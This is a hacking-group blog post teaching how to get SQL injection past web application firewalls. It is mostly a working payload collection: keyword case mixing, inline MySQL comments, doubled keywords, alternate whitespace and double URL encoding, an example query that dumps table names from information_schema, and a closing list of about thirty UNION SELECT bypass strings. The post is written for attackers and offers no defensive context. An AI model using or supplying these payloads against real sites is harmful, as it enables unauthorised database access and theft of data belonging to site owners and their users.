WAF BYPASSING IN SQL INJECTIONS

18:52 ---

Hello!
readers

Today I share a tutorial on

WAF Byassing In SQL Injections

What is WAF ?
WAF stands for Web Application Firewall. It is
widely used nowadays to detect and defend
SQL Injections and Cross Site Scripting (XSS)
attacks.

How does it Work?
When WAF detects any malicious input from
end user, It gives 403 Forbidden, 406 Not
Acceptable or any Kind of Custom errors

How to bypass this things?

what to do next? we cant do our further
injection right?

Well its time to use various techniques to
bypass thing.
Some of these techniques are
mentioned below:

# Case Changing:

Most of the Waf's only filter lowercase or
higher-case keywords. We can easily evade
that kind of wafs by using alternate case.

if union select is forbidden , we can always try
UNION SELECT instead. And if both does not
work, We can try our luck with using mixture
of both. like UniOn seLeCt

# Using Comments

It is the most famous method to bypass WAF .

SQL comments really help us in many cases.

They play their important role in killing some
Waf's Restrictions. e.g

// , -- , --+ , #, -- -

# Inline Comments

Some WAF’s filter keywords like

/union\sselect/ig

We can bypass these filters by
using inline comments most of the time

http://localhost/waf.php?id=1 /*!union*/ /*!
select*/ 1,2,3--

Read SQLi Errors carefully. Sometimes
they left error from which we can have idea
that how waf is working on this site.
Anyways, We were talking about Filtered
Keywords. So it does not mean that waf is
only filtering union select. It may be filtering
all SQL keywords like table_name, column_name etc
So might need to apply these inline comments
on those keywords as well.

Example

http://localhost/waf.php?id=1 /*!union*/ /*!
select*/ 1,2,/*!table_name*/,4,5 /*!from*/ /*!
information_schema.tables*/ /*!where*/ /*!
table_schema*/=database()--

# Double use of Keywords

Sometimes WAF removes whole keyword from
the query and execute it and throw errors
In such cases, we can use keywords in this
way

http://localhost/waf.php?id=1 UNunionION
SELselectECT 1,2,3,4,5,6--

Anyways It totally depends upon the scenario.
Im just giving a common Idea. Rest is upon
you that how you use it.

# Using Different types of Whitespaces

Sometime Waf may be filtering the whitespace

we are using between keywords. We mostly
use Spaces But space is not the only
whitespace we can use in SQL injection. We
have some other options as well
for example
+ . %20

is use for space, but we can try using one
of these whitespaces . some examples are

%09
%0A %0B %0C %0D %A0

inurl:
union%0Bselect%0B1,2,3--

# Encoding

We can always try our luck with URL encode
thing to bypass WAF. For example we can use

union select 1,/*!table_name*/,3 from
information_schema.tables where table_
schema=database()

as

union%20select%201,%2f%2a%21table_name
%2a%2f,3%20from%20information_
schema.tables%20where%20table_schema%
3Ddatabase%28%29

but sometime waf filter also filter % itself. So
we have to use double URL encoding in that
case

union%2520select%25201,%2f%2a%21table_name%2a%2f%2520,3 from%2520information_schema.tables%2520where%2520table_schema%253Ddatabase%2528%2529

# Unexpected Input

This scenario is very rare that we have to use
buffer overflow or give unexpected query /
request to trick WAF filters.
for example:

http://localhost/waf.php?id=1 and (select 1)=
(Select
0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA)
union select 1,2,3,4,5--

This thing only worked once for me. But
knowledge is Power, may be you face any
scenario that can be bypassed by using buffer
overflow

# use all above mentioned techniques together

oh!!! .... tried all those things but still its showing
NOT ACCEPTABLE or FORBIDDEN.

well its
time to use all these above mentioned
techniques combined.

For example: you can use alternative cases
with inline comments or obfuscation.

#Some Common Union Select Solutions:

%55nion(%53elect 1,2,3)-- -
+union+distinct+select+
+union+distinctROW+select+
/**//*!12345UNION SELECT*//**/
/**//*!50000UNION SELECT*//**/
/**/UNION/**//*!50000SELECT*//**/
/*!50000UniON SeLeCt*/
union /*!50000%53elect*/
+#uNiOn+#sEleCt
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
/*!%55NiOn*/ /*!%53eLEct*/
/*!u%6eion*/ /*!se%6cect*/
+un/**/ion+se/**/lect
uni%0bon+se%0blect
%2f**%2funion%2f**%2fselect
union%23foo*%2F*bar%0D%0Aselect%23foo%
0D%0A
REVERSE(noinu)+REVERSE(tceles)
/*--*/union/*--*/select/*--*/
union (/*!/**/ SeleCT */ 1,2,3)
/*!union*/+/*!select*/
union+/*!select*/
/**/union/**/select/**/
/**/uNIon/**/sEleCt/**/
/**//*!union*//**//*!select*//**/
/*!uNIOn*/ /*!SelECt*/
+union+distinct+select+
+union+distinctROW+select+
uNiOn aLl sElEcT

I hope you have enjoyed this article.
Next Time We Share Some More Tutorials on WAF bypassing.

Please
give us your feedback. So that we may be able
to make things more clear for you next time .

#Indian_Elite_Hackers

Posted by INDIAN ELITE HACKERS at 18:52
Labels: , , , ,

0 comments:

Post a Comment

Subscribe to: Post Comments (Atom)